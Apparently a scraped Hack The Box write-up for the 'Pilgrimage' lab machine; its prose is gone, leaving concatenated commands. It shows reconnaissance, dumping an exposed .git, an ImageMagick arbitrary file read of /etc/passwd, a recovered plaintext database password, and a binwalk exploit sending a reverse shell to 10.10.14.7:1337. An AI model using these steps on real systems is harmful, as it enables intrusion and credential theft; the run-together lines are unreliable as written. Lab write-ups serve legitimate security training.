Pilgrimage
Writeup Hack The Box Pilgrimage

Port Scanning

Exploitation











Get Low User

Privilege Escalation





Last updated
Writeup Hack The Box Pilgrimage



















Last updated
sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.219python3 git_dumper.py http://pilgrimage.htb/.git/ Pilgrimageexec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);cargo run "/etc/passwd"identify -verbose 64a0e52437392.pngecho "hex value here" | xxd -r -pnano db.sh#!/bin/bash
echo "hex value" | xxd -r -pbash db.sh > asuka.sqlite➜ tmp sqlite3 asuka.sqlite
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES('emily','abigchonkyboi123');
CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL);
COMMIT;
sqlite> /bin/bash /usr/sbin/malwarescan.sh
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
done
python3 RCE_Binwalk.py asuka.png 10.10.14.7 1337